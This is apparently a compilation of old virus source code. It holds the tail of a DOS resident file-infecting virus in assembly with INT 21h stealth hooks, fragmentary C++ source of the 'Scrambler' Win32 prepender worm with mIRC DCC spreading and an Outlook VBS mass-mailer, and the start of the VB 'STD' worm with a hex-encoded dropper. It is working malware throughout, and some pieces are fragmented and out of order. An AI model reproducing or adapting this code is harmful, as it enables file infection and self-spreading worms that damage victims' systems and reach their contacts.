;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz checkz whether there'z a viruz in the file or not ...
; and if not returnz in ax the value which iz 4 infected
sub_1157 proc near
push dx
mov ax, es:[bx+2] ; gimme date
xor dx, dx
div word ptr cs:[date_div-p]; div it
mov ax, es:[bx] ; gimme time
and al, 1Fh ; and it
cmp al, dl ; the same ?
stc ; set Cflag (infected)
jz short loc_1176
mov ax, es:[bx] ; gimme time
and ax, 0FFE0h ; and it
or al, dl ; or it with date
clc ; clear Cflag (not infected)
loc_1176:
pop dx
retn ; and end ...
sub_1157 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Sub viruz_size
sub_1178 proc near
sub word ptr es:[bx], offset buffer - p; sub viruz_file
sbb word ptr es:[bx+2], 0
jnc short loc_ret_118E ; underflow ?
add word ptr es:[bx], offset buffer - p; yope
adc word ptr es:[bx+2], 0 ; so add it back
loc_ret_118E:
retn
sub_1178 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz iz main infection routine ...
sub_118F proc near
push ax
push bx
push cx
push si ; push regz
push di
push bp
push ds
push es
call sub_1034 ; set my int_24h
mov ax, 4300h ; gimme file_attribz
call int_21h
mov cs:[file_attribz - p], cx; store it
mov ax, 4301h ; set new attribz
xor cx, cx ; no attribz
call int_21h
jc short loc_11D3 ; error ?
mov ax, 3D02h ; open file 4 read_&_write
call int_21h
jc short loc_11CA ; error ?
push dx
push ds
push cs
pop ds
push cs
pop es
mov ds:[handle - p], ax ; store handle
call sub_0E7C ; ok infect the file
mov ah, 3Eh
call sub_0E6F ; close file
pop ds
pop dx
loc_11CA:
mov ax, 4301h ; set back old_attribz
db 0b9h ; mov cx, ?
file_attribz dw 20h
call int_21h
loc_11D3:
call sub_1052 ; set back old_int_24h
pop es
pop ds
pop bp
pop di
pop si ; restore regz
pop cx
pop bx
pop ax
retn ; and end ...
sub_118F endp
new_int_21h:
pushf
sti
cmp ah, 11h ; find_first_FCB_file ?
je short loc_11EB
cmp ah, 12h ; find next_FCB_file ?
jne short loc_121A
loc_11EB:
db 0ebh
fcb_jmp_ db 0
push bx
push es
push ax
mov ah, 2Fh ; gimme DTA_addr
call int_21h
pop ax
call int_21h ; do FCB_function
cmp al, 0FFh ; did we find something ?
je short loc_1216
push ax ; yope
cmp byte ptr es:[bx], 0FFh ; extended FCB ?
jne short loc_1207
add bx, 7 ; yope so jump over ext_FCB
loc_1207:
add bx, 17h ; go2 time
call sub_1157 ; check whether infected
pop ax
jnc short loc_1216 ; already infected ?
add bx, 6 ; go2 file_size
call sub_1178 ; sub viruz_size
loc_1216: ; nope
pop es
pop bx
popf
iret
loc_121A:
cmp ah, 4Eh ; find_first_file ?
je short loc_1224
cmp ah, 4Fh ; find_next_file ?
jne short loc_1250
loc_1224:
push bx
push es
push ax
mov ah, 2Fh ; gimme DTA_addr
call int_21h
pop ax
call int_21h ; do find_function
jc short loc_1249 ; error ?
push ax
add bx, 16h ; go2 time
call sub_1157 ; check whether infected
pop ax
jnc short loc_1242 ; already infected ?
add bx, 4 ; go2 file_size
call sub_1178 ; sub viruz_size
loc_1242: ; nope
pop es
pop bx ; restore regz
popf
clc ; clear error_flag
retf 2 ; and end ...
loc_1249: ; yope
pop es
pop bx ; restore regz
popf
stc ; set error_flag
retf 2 ; and end ...
loc_1250:
cmp ax, 4B53h ; it'z mark ?
jne short loc_125A
mov ax, 454Bh ; yope so get 454bh
popf
iret ; and end ...
loc_125A:
cmp ah, 4Ch ; prog'z_end ?
jne short loc_1265
mov byte ptr cs:[fcb_jmp_ - p], 0
loc_1265:
cld
push dx
cmp ax, 4B00h ; run_prog ?
jne short loc_12A9
db 0ebh
run_jmp db offset loc_12a7 - ($ + 1)
push ax
push bx
push ds ; push regz
push es
mov ah, 52h ; gimme list_of_listz
call int_21h
mov ax, es:[bx-2] ; gimme first_mcb
loc_127B:
mov ds, ax
add ax, ds:[3] ; go2 next mcb_block
inc ax
cmp byte ptr ds:[0], 5Ah ; last_one ?
jne loc_127B
mov bx, cs ; yope
cmp ax, bx ; it'z our mcb_block ?
jne short loc_129D
mov byte ptr ds:[0], 4Dh ; make middle_block
xor ax, ax
mov ds, ax
add word ptr ds:[413h], 4 ; add 4K 2 mem which we took
loc_129D:
mov byte ptr cs:[run_jmp-p], offset loc_12a7 - (run_jmp + 1)
pop es ; now jump 2 loc_12a7
pop ds
pop bx ; restore regz
pop ax
loc_12A7:
jmp short loc_12FD
loc_12A9:
cmp ah, 3Dh ; open_file ?
je short loc_12FD
cmp ah, 56h ; rename_file ?
je short loc_12FD
cmp ax, 6C00h ; ext_open_found ?
jne short loc_12C1
test dl, 00010010b ; action 02h or/and 10h ?
mov dx, si
jz short loc_12FD
jmp short loc_1307 ; yope
loc_12C1:
cmp ah, 3Ch ; found_file ?
je short loc_1307
cmp ah, 5Bh ; make_new_file ?
je short loc_1307
cmp ah, 3Eh ; close_file ?
jne short loc_12F6
cmp bx, word ptr cs:[ext_handle - p]; do we have
jne short loc_12F6 ; something 2 infect ?
or bx, bx ; handle is null ?
jz short loc_12F6
call int_21h ; close it
jc short loc_1323
push ds
push cs
pop ds
mov dx, offset ext_file_name - p; gimme file_name
call sub_118F ; and infect it
mov word ptr ds:[ext_handle - p], 0; nulluj ext_handle
pop ds
loc_12F0:
pop dx
popf
clc ; clear error_flag
retf 2 ; and end ...
loc_12F6:
pop dx
popf ; jmp 2 old_int_21h
jmp dword ptr cs:[old_int_21h - p__]
loc_12FD:
call sub_1098 ; check 4 file_name & disk
jc loc_12F6 ; error ?
call sub_118F ; infect it
jmp short loc_12F6
loc_1307:
cmp word ptr cs:[ext_handle - p], 0
jne loc_12F6 ; ext_file already founded ?
call sub_1098 ; check 4 file_name & disk
jc loc_12F6 ; error ?
mov word ptr cs:[file_offset - p], dx; store file_name_
pop dx ; _offset
push dx
call int_21h ; found it
db 0bah ; mov dx, ?
file_offset dw 45cch
jnc short loc_1329 ; error ?
loc_1323: ; yope
pop dx
popf
stc ; set error_flag
retf 2 ; and end ...
loc_1329:
push cx
push si
push di ; ok
push es ; move file_name
xchg si, dx ; 2 our buffer
mov di, offset ext_handle - p
push cs
pop es
stosw ; and store handle of course
mov cx, 4Bh ; move 4bh bytez
rep movsb ; and finally move
pop es
pop di
pop si ; restore regz
pop cx
jmp short loc_12F0 ; and end ...
;
db 'Did you leave the room ?'
;
run_counter dw 04FBh
buffer db 160h dup(?)
three_bytez db ? ; offset 14bah
; instr_buffer - 3
; 0e9h disp16 haz 3 bytez ...
handle dw ? ; offset 14bbh
instr_buffer db 10 dup(?) ; offset 14bdh
file_buffer db 1ah dup(?) ; offset 14c7h
old_int_24h dd ? ; offset 14e1h
file_time_date dd ? ; offset 14e5h
ext_handle dw ? ; offset 14e9h
ext_file_name db 4bh dup(?) ; offset 14ebh
name_buffer db 4bh dup(?) ; offset 1536h
;
seg_a ends
end start
/*
Virus Name: Scrambler
Version: B
Type: Win32 EXE Prepender / I-Worm
Author: Gigabyte
Homepage: http://gigabyte.coderz.net
*/
#include <iostream>
#include <windows.h>
#include <direct.h>
#include <time.h>
strcpy(checksum, Buffer);
strcat(checksum, Buffer);
}
fclose(SRC);
}
while(! feof(SRC))
{
Counter = fread(Buffer, 1, 1024, SRC);
if(Counter)
fwrite(Buffer, 1, Counter, DST);
}
}
}
fclose(SRC);
fclose(DST);
}
bool FileExists(char *FileName)
{
HANDLE Exists;
Exists = CreateFile(FileName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, 0,
OPEN_EXISTING, 0, 0);
if(Exists == INVALID_HANDLE_VALUE)
return false;
CloseHandle(Exists);
return true;
}
strcpy(mp3, FolderSearch);
strcat(mp3, "\\");
strcat(mp3, FindData.cFileName );
strcpy(mp3copy, "mp3.tmp");
CopyFile(mp3, mp3copy, FALSE);
Scramble(mp3copy,mp3);
_unlink(mp3copy);
}
}
while (FindNextFile(FoundFile, &FindData));
FindClose(FoundFile);
}
}
void ScriptFile()
{
GetWindowsDirectory(Buffer,MAX_PATH);
fprintf(scrambler,"[script]\nn0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }\nn1=/dcc
send $nick");
fprintf(scrambler," %s%csystem%c%s\nn2=}\n", Buffer, 92, 92, CopyName);
}
strcpy(Virus, argv[0]);
GetWindowsDirectory(Buffer,MAX_PATH);
strcpy(FullPath, Buffer);
strcat(FullPath, "\\system\\");
strcat(FullPath, CopyName);
WriteVirus(Virus, FullPath);
WIN32_FIND_DATA FindData;
HANDLE FoundFile;
strcat(DirToInfect, Buffer);
strcat(DirToInfect, "\\*.exe");
FoundFile = FindFirstFile(DirToInfect, &FindData);
if(FoundFile != INVALID_HANDLE_VALUE)
{
do
{
if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
}
else
{
GetWindowsDirectory(Buffer,MAX_PATH);
_chdir(Buffer);
_chdir("system");
strcpy(hostfile, Buffer);
strcat(hostfile, "\\");
strcat(hostfile, FindData.cFileName);
VirCheck(hostfile);
strcpy(gbmark,"gb");
if(FindData.cFileName[3] != 'D')
{
if(FindData.cFileName[0] != 'P')
{
if(FindData.cFileName[0] != 'R')
{
if(FindData.cFileName[0] != 'E')
{
if(FindData.cFileName[0] != 'T')
{
if(FindData.cFileName[0] != 'W')
{
if(FindData.cFileName[0] != 'w')
{
if(FindData.cFileName[5] != 'R')
{
if(checksum[1] != gbmark[1])
{
strcpy(CopyHost, "host.tmp");
CopyFile(hostfile, CopyHost, FALSE);
strcpy(Virus, argv[0]);
CopyFile(FullPath, hostfile, FALSE);
AddOrig(CopyHost, hostfile);
_unlink("host.tmp");
}}}}}}}}}
}
}
while (FindNextFile(FoundFile, &FindData));
FindClose(FoundFile);
}
if(FileExists("c:\\mirc\\mirc32.exe"))
{
FoundFile = FindFirstFile("c:\\mirc\\download\\*.exe", &FindData);
if(FoundFile != INVALID_HANDLE_VALUE)
{
do
{
if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
}
else
{
_chdir(Buffer);
_chdir("system");
strcpy(hostfile, "c:\\mirc\\download\\");
strcat(hostfile, FindData.cFileName );
VirCheck(hostfile);
strcpy(gbmark,"gb");
if(checksum[1] != gbmark[1])
{
strcpy(CopyHost, "host.tmp");
CopyFile(hostfile, CopyHost, FALSE);
WriteVirus(Virus, hostfile);
AddOrig(CopyHost, hostfile);
_unlink("host.tmp");
}
}
}
while (FindNextFile(FoundFile, &FindData));
FindClose(FoundFile);
}
}
scrambler = fopen("c:\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}
scrambler = fopen("c:\\PROGRA~1\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}
scrambler = fopen("d:\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}
scrambler = fopen("d:\\PROGRA~1\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}
scrambler = fopen("e:\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}
scrambler = fopen("e:\\PROGRA~1\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}
scrambler = fopen("f:\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}
scrambler = fopen("f:\\PROGRA~1\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}
strcpy(RepairHost, Buffer);
strcat(RepairHost, "\\system\\hostfile.exe");
CopyOrig(Virus, RepairHost);
strcpy(ScramFile, Buffer);
strcat(ScramFile, "\\system\\scram.sys");
if(FileExists(ScramFile) == false)
HDDSearch("c:");
strcpy(WinScript, Buffer);
strcat(WinScript, "\\wscript.exe");
if(FileExists(WinScript))
{
if(FileExists("scram.sys") == false)
{
scrambler = fopen("scrambler.vbs","wt");
if(scrambler)
{
fprintf(scrambler,"On Error Resume Next\n");
fprintf(scrambler,"Dim scrambler, Mail, Counter, A, B, C, D, E, F\n");
fprintf(scrambler,"Set scrambler = CreateObject(%coutlook.application%c)\n",
34, 34);
fprintf(scrambler,"Set Mail = scrambler.GetNameSpace(%cMAPI%c)\n", 34, 34);
fprintf(scrambler,"For A = 1 To Mail.AddressLists.Count\n");
fprintf(scrambler,"Set B = Mail.AddressLists(A)\n");
fprintf(scrambler,"Counter = 1\n");
fprintf(scrambler,"Set C = scrambler.CreateItem(0)\n");
fprintf(scrambler,"For D = 1 To B.AddressEntries.Count\n");
fprintf(scrambler,"E = B.AddressEntries(Counter)\n");
fprintf(scrambler,"C.Recipients.Add E\n");
fprintf(scrambler,"Counter = Counter + 1\n");
fprintf(scrambler,"If Counter > 90 Then Exit For\n");
fprintf(scrambler,"Next\n");
fprintf(scrambler,"C.Subject = %cCheck this out, it's funny!%c\n", 34, 34);
fprintf(scrambler,"C.Attachments.Add %c%s%csystem%c%s%c\n", 34, Buffer, 92,
92, CopyName, 34);
fprintf(scrambler,"C.DeleteAfterSubmit = True\n");
fprintf(scrambler,"C.Send\n");
fprintf(scrambler,"E = %c%c\n", 34, 34);
fprintf(scrambler,"Next\n");
fprintf(scrambler,"Set F = CreateObject(%cScripting.FileSystemObject%c)\n",
34, 34);
fprintf(scrambler,"F.DeleteFile Wscript.ScriptFullName\n");
fclose(scrambler);
}
ShellExecute(NULL, "open", "scrambler.vbs", NULL, NULL, SW_SHOWNORMAL);
}
}
_chdir(Buffer);
scrambler = fopen("winstart.bat", "wt");
if(scrambler)
{
fprintf(scrambler,"@cls\n");
fprintf(scrambler,"@echo Today..\n");
fprintf(scrambler,"@echo I'm going to scramble your mind..\n");
}
fclose(scrambler);
_chdir("system");
if(FileExists(RepairHost))
WinExec(RepairHost, SW_SHOWNORMAL);
_unlink("hostfile.exe");
}
Attribute VB_Name = "STD"
'STD v1.0 by Error of Team Necrosis
' Commented by Error, pardon my commenting style
' ********W32.HLLP.STD.worm Source*********
' STD is a Memory-Resident EXE prepender with
' Worm functions for Outlook and mIRC
Public myDNA, myRNA, MyCode, STD, Grime, MySTD As String
Public FDateTime, oldDate, FDate, OldTime, FTime As String
Const MySize = 17920
Const RSP_SIMPLE_SERVICE = 1
Const RSP_UNREGISTER_SERVICE = 0
Private iResult, hProg, idprog, iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Const Notification = "Hey, sorry I haven't written to you in a while. " & _
"Well you could call it a while. I'm writing this E-mail " & _
"to let you know of an attachment im sending with the next mail."
Const Notify = "Here is the e-mail attachment I told you about earlier, " & _
"It's an installation program for "
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long,
ByVal dwType As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal
bInheritHandle As Long, ByVal dwProcessID As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long,
lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Sub Form_Load()
' I put STD into a form because if you compile
' it into a module you wont be able to chose
' what default icon STD will have, and it ends
' up with a nasty baby blue and white form.
' Which is very noticable since STD's icon
' becomes the infected EXE's icon. i then made
' the MS-DOS Program Icon as the default icon
Sub CreatePKunzip()
Open "c:\windows\pkunzip.dbg" For Output As #2
Print #2, "N PKUNZIP.COM"
Print #2, "E 0100 B9 2E B9 BF BE 0B 2B CF 32 C0 F3 AA B4 30 CD 21"
Print #2, "E 0110 A3 22 B9 8D A5 00 06 89 26 26 B9 B8 C6 09 E8 50"
Print #2, "E 0120 00 E8 C0 01 B8 4B 0A E8 31 00 B8 62 A9 E8 2B 00"
Print #2, "E 0130 E8 61 00 E8 3E 00 A0 20 B9 E9 0E 00 BB 65 0A 50"
Print #2, "E 0140 53 92 E8 34 00 58 E8 28 00 58 B4 4C CD 21 C6 06"
Print #2, "E 0150 20 B9 01 50 B8 5B 0A E8 1F 00 58 E8 88 02 8B F0"
Print #2, "E 0160 E8 23 00 8B 1E BC 0B 8B D6 91 B4 40 CD 21 E9 82"
Print #2, "E 0170 02 E8 E7 FF B8 48 0A EB E2 50 E8 F7 FF B8 3E 0A"
Print #2, "E 0180 E8 D8 FF 58 EB D5 56 96 BA FF FF AC 42 84 C0 75"
Print #2, "E 0190 FA 92 5E C3 E8 4F 02 33 C9 33 D2 88 0E 2A AA 8B"
Print #2, "E 01A0 1E 28 B9 B8 02 42 CD 21 8B F0 85 D2 75 05 3D 00"
Print #2, "E 01B0 10 72 03 BE 00 10 2B C6 83 DA 00 95 8B FA 83 EE"
Print #2, "E 01C0 12 8B D5 8B CF E8 EF 00 BA 00 0E 8D 4C 12 E8 EC"
Print #2, "E 01D0 00 8B CE C7 06 68 0A 05 06 B8 66 0A E8 A3 00 85"
Print #2, "E 01E0 C0 75 1F 8B C5 0B C7 74 11 81 ED EA 0F 83 DF 00"
Print #2, "E 01F0 7D CF 03 F5 33 ED 33 FF EB C7 B0 03 BA 6A 0A E9"
Print #2, "E 0200 3A FF 97 8B 4D 14 E3 31 56 8D 75 16 33 DB AC 3C"
Print #2, "E 0210 1B 74 0C 3C 13 75 03 43 EB 05 92 B4 02 CD 21 E2"
Print #2, "E 0220 ED 5E E8 4F FF 85 DB 74 10 B8 86 0A E8 99 00 72"
Print #2, "E 0230 05 B0 08 E9 14 FF E8 3B FF 8B 36 26 B9 8B 55 10"
Print #2, "E 0240 8B 4D 12 E8 71 00 83 7D 0E 00 75 2E 8B 4D 0C A1"
Print #2, "E 0250 06 00 2B C6 3B C1 72 22 8B D6 E8 60 00 8B 4D 0A"
Print #2, "E 0260 E3 15 8B 5C 1C 8B 54 1E 8D 78 2E 03 FA 03 7C 20"
Print #2, "E 0270 E8 B2 01 8B F7 E2 EB E9 79 01 B0 07 BA B5 0A E9"
Print #2, "E 0280 BA FE E8 61 01 96 33 C0 A3 D6 AE E3 24 8B FA AD"
Print #2, "E 0290 47 4F AF E0 FC 83 F9 01 76 17 A7 74 06 4F 4F 4E"
Print #2, "E 02A0 4E EB EE 8D 5D FC 89 1E D6 AE 80 3E 2A AA 00 74"
Print #2, "E 02B0 EC A1 D6 AE E9 3C 01 53 B8 00 42 EB 03 53 B4 3F"
Print #2, "E 02C0 8B 1E 28 B9 CD 21 5B C3 E8 90 FE B8 08 0C CD 21"
Print #2, "E 02D0 24 DF 3C 59 74 04 3C 4E 75 F1 92 B4 02 CD 21 80"
Print #2, "E 02E0 EA 4F F5 C3 E8 D5 00 BE 81 00 8A 4C FF 32 ED E3"
Print #2, "E 02F0 1E AC 3C 20 74 17 3C 09 74 13 3C 2D 75 6D AC 49"
Print #2, "E 0300 74 0D 3C 6F 74 04 3C 4F 75 03 A2 FC A9 E2 E2 80"
Print #2, "E 0310 3E 24 B9 00 74 34 BE 62 A9 33 DB AC 3C 2E 75 01"
Print #2, "E 0320 43 84 C0 75 F6 85 DB 75 0A C7 44 FF 2E 5A C7 44"
Print #2, "E 0330 01 49 50 BA 62 A9 B8 00 3D 80 3E 22 B9 03 72 02"
Print #2, "E 0340 B0 20 CD 21 A3 28 B9 72 09 C3 BA D1 0A B0 02 E9"
Print #2, "E 0350 EA FD BA C4 0A BB 62 A9 B0 02 E9 E2 FD AC 3C 20"
Print #2, "E 0360 74 90 3C 09 74 8C AA E2 F4 EB A4 80 3E 24 B9 00"
Print #2, "E 0370 75 08 BF 62 A9 A2 24 B9 EB 03 BF E0 AE AA EB E7"
Print #2, "E 0380 E8 63 00 8B F2 8B E9 8B 0E 2A B9 8B 16 2C B9 BF"
Print #2, "E 0390 BC AA FC 33 C0 45 EB 16 AC 8B D8 32 D9 8A CD 8A"
Print #2, "E 03A0 EA 8A D6 8A F7 D1 E3 D1 E3 33 09 33 51 02 4D 75"
Print #2, "E 03B0 E7 89 0E 2A B9 89 16 2C B9 E9 37 00 E8 27 00 FD"
Print #2, "E 03C0 BF BA AE BD FF 00 B9 08 00 8B D5 33 C0 D1 E8 D1"
Print #2, "E 03D0 DA 73 07 81 F2 20 83 35 B8 ED E2 F1 AB 92 AB 4D"
Print #2, "E 03E0 79 E4 FC E9 0D 00 8F 06 D2 AE 55 56 57 53 51 FF"
Print #2, "E 03F0 26 D2 AE 59 5B 5F 5E 5D C3 50 56 57 97 8B F2 AC"
Print #2, "E 0400 AA 84 C0 75 FA 5F 5E 58 C3 52 56 8B F0 E8 76 FD"
Print #2, "E 0410 03 C6 5E 5A EB E3 B8 05 0B E8 32 FD B8 7C AA E8"
Print #2, "E 0420 39 FD E9 CE FF E8 BE FF E8 E3 00 8A 44 0A 3C 08"
Print #2, "E 0430 74 04 84 C0 75 E0 03 D3 83 C2 1E 33 C9 03 54 2A"
Print #2, "E 0440 13 4C 2C E8 71 FE E8 54 00 85 C0 74 4D E8 24 FD"
Print #2, "E 0450 B8 FF FF A3 2A B9 A3 2C B9 8B 44 0A 48 78 05 E8"
Print #2, "E 0460 FB 00 EB 03 E8 BA 00 A1 2A B9 8B 16 2C B9 F7 D0"
Print #2, "E 0470 F7 D2 2B 44 10 1B 54 12 0B C2 74 0B B8 52 0B E8"
Print #2, "E 0480 CC FC C6 06 20 B9 01 8B 1E D0 AE 8B 4C 0C 8B 54"
Print #2, "E 0490 0E B8 01 57 CD 21 B4 3E CD 21 E9 56 FF E8 46 FF"
Print #2, "E 04A0 BF 7C AA 8B CB 03 FB 4F FD B0 2F F2 AE 75 01 47"
Print #2, "E 04B0 47 FC B8 2C AA BA E0 AE E8 3E FF 50 8B D7 E8 48"
Print #2, "E 04C0 FF 58 80 3E FC A9 00 75 29 50 BA FE A9 B4 1A CD"
Print #2, "E 04D0 21 5A B4 4E B9 07 00 CD 21 72 17 B8 00 43 CD 21"
Print #2, "E 04E0 72 10 92 E8 68 FC B8 26 0B E8 DC FD 72 04 33 C0"
Print #2, "E 04F0 EB 19 B9 20 00 B4 3C BA 2C AA CD 21 73 0A 8B DA"
Print #2, "E 0500 BA 43 0B B0 05 E9 37 FC A3 D0 AE E9 E5 FE E8 D5"
Print #2, "E 0510 FE BF 7C AA 8D 74 2E 8B CB F3 A4 32 C0 AA E9 D2"
Print #2, "E 0520 FE E8 C2 FE B8 67 0B E8 31 FC B8 2C AA E8 2B FC"
Print #2, "E 0530 B9 62 9B 8B 7C 14 8B 74 16 85 F6 75 06 3B CF 72"
Print #2, "E 0540 02 8B CF BA 00 0E 52 E8 73 FD 5A 85 C0 74 0B 2B"
Print #2, "E 0550 F8 83 DE 00 91 E8 47 04 EB DF E9 96 FE E8 86 FE"
Print #2, "E 0560 B8 74 0B E8 F5 FB B8 2C AA E8 EF FB E8 30 00 E9"
Print #2, "E 0570 81 FE 80 FD 08 74 05 8A CD E8 F4 00 8B CA AD 33"
Print #2, "E 0580 C2 40 74 03 E9 C3 02 A4 81 FF 00 9E 72 03 E8 F9"
Print #2, "E 0590 03 81 FE 20 B7 72 03 E8 C4 00 E2 EB 58 EB 0B C6"
Print #2, "E 05A0 06 DE AE 00 E8 B7 00 BF 00 0E B5 08 AD 92 80 3E"
Print #2, "E 05B0 DE AE 00 75 57 E8 8E 00 D0 16 DE AE E8 95 01 E8"
Print #2, "E 05C0 C2 00 84 E4 75 0C AA 81 FF 00 9E 72 F2 E8 BA 03"
Print #2, "E 05D0 EB ED 3D 00 01 74 D7 2D FE 00 50 E8 0D 01 91 59"
Print #2, "E 05E0 56 8D 75 FF 2B F3 72 06 81 FE 00 0E 73 18 BB 00"
Print #2, "E 05F0 0E 2B DE 03 36 DC AE 3B D9 73 0B 87 D9 2B D9 F3"
Print #2, "E 0600 A4 BE 00 0E 87 D9 F3 A4 5E 91 EB BB 8B CF BA 00"
Print #2, "E 0610 0E 2B CA E8 89 03 C3 80 F9 08 77 12 53 33 C0 33"
Print #2, "E 0620 DB 8A D9 8A 87 A8 0B 22 C2 E8 44 00 5B C3 53 33"
Print #2, "E 0630 DB 8A D9 B1 08 2A D9 E8 E2 FF 8A CB 8A D8 E8 DB"
Print #2, "E 0640 FF 0A F8 93 5B C3 D1 EA FE CD 74 01 C3 9C 81 FE"
Print #2, "E 0650 20 B7 72 03 E8 07 00 8A 34 46 B5 08 9D C3 50 51"
Print #2, "E 0660 52 B9 00 08 BA 20 AF 8B F2 E8 51 FC 5A 59 58 C3"
Print #2, "E 0670 2A E9 77 0D F6 DD 2A CD D3 EA 8A CD E8 CE FF 2A"
Print #2, "E 0680 E9 D3 EA C3 8A DA 32 FF D1 E3 8B 9F 62 A0 85 DB"
Print #2, "E 0690 78 0E 8A 8F 02 9F E8 D7 FF 93 3D 09 01 73 09 C3"
Print #2, "E 06A0 B8 62 A4 E8 26 00 EB EE 3D 1D 01 74 1B 2D 01 01"
Print #2, "E 06B0 8A C8 D0 E9 D0 E9 49 25 03 00 04 04 D3 E0 05 01"
Print #2, "E 06C0 01 93 E8 52 FF 03 C3 C3 B8 00 02 C3 B1 08 E8 9F"
Print #2, "E 06D0 FF 56 96 8A C2 32 C9 F7 D3 FE C1 D1 EB D1 E8 D1"
Print #2, "E 06E0 D3 D1 E3 8B 18 85 DB 78 EE 5E C3 8A DA 32 FF D1"
Print #2, "E 06F0 E3 8B 9F 62 A2 85 DB 78 1F 8A 8F 42 A0 E8 70 FF"
Print #2, "E 0700 80 FB 04 72 12 93 8A C8 D0 E9 49 24 01 04 02 D3"
Print #2, "E 0710 E0 93 E8 02 FF 03 D8 C3 B8 E2 A8 E8 AE FF EB DD"
Print #2, "E 0720 56 51 BF 02 9F B9 90 00 B0 08 F3 AA B1 70 FE C0"
Print #2, "E 0730 F3 AA B1 18 B0 07 F3 AA B1 08 FE C0 F3 AA BF 42"
Print #2, "E 0740 A0 B1 20 89 0E FA A9 B0 05 F3 AA C7 06 D4 AE 20"
Print #2, "E 0750 01 E9 D4 00 B1 02 E8 BE FE 48 79 03 E9 13 FE 57"
Print #2, "E 0760 74 BE 48 74 03 E9 E2 00 B1 05 E8 AA FE 05 01 01"
Print #2, "E 0770 A3 D4 AE B1 05 E8 9F FE 40 A3 FA A9 51 BF BC AE"
Print #2, "E 0780 B9 13 00 32 C0 F3 AA 59 B1 04 E8 8A FE 05 04 00"
Print #2, "E 0790 BF 96 0B 8B EF 03 E8 33 DB B1 03 E8 79 FE 8A 1D"
Print #2, "E 07A0 88 87 BC AE 47 3B FD 72 F0 56 51 BF 20 B7 BE BC"
Print #2, "E 07B0 AE B8 13 00 E8 9B 00 59 5E 8B 2E D4 AE 03 2E FA"
Print #2, "E 07C0 A9 BF 02 9F 32 FF 8A DA D1 E3 8B 9F 20 B7 8A 8F"
Print #2, "E 07D0 BC AE E8 9B FE 8A C3 3C 10 73 06 AA 4D 75 E5 EB"
Print #2, "E 07E0 35 77 0C B1 02 E8 2F FE 04 03 8A 4D FF EB 17 3C"
Print #2, "E 07F0 11 77 09 B1 03 E8 1F FE 04 03 EB 08 B1 07 E8 16"
Print #2, "E 0800 FE 05 0B 00 32 C9 51 86 C1 32 ED 2B E9 72 3B F3"
Print #2, "E 0810 AA 59 85 ED 75 AE 56 51 BE 02 9F BF 42 A0 03 36"
Print #2, "E 0820 D4 AE 8B 0E FA A9 F3 A4 A1 D4 AE BE 02 9F BF 62"
Print #2, "E 0830 A0 BD 62 A4 E8 1B 00 A1 FA A9 BE 42 A0 BF 62 A2"
Print #2, "E 0840 BD E2 A8 E8 0C 00 59 5E 5F C3 BA 81 0B B0 04 E9"
Print #2, "E 0850 EA F8 85 C0 74 F3 52 A3 D6 A9 89 3E D8 AE BF D8"
Print #2, "E 0860 A9 57 B9 10 00 33 C0 F3 AB 5F 56 8B 0E D6 A9 33"
Print #2, "E 0870 DB AC 8A D8 D1 E3 FF 01 E2 F7 BE B2 A9 BB 02 00"
Print #2, "E 0880 33 C0 89 00 B1 0F 03 87 D8 A9 D1 E0 43 43 89 00"
Print #2, "E 0890 E2 F4 83 38 00 74 12 BE DA A9 B9 0F 00 33 DB AD"
Print #2, "E 08A0 03 D8 E2 FB 83 FB 01 77 A1 5E 56 8B 0E D6 A9 BF"
Print #2, "E 08B0 C0 0B AC 32 E4 85 C0 74 0E 8B D8 D1 E3 8B 87 B2"
Print #2, "E 08C0 A9 40 89 87 B2 A9 48 AB E2 E8 5E 56 BF C0 0B 8B"
Print #2, "E 08D0 16 D6 A9 AC 8A C8 49 78 17 74 15 8B 1D 33 C0 D1"
Print #2, "E 08E0 EB D1 D0 E0 FA 41 D1 EB D3 D0 AB 4A 75 E5 EB 07"
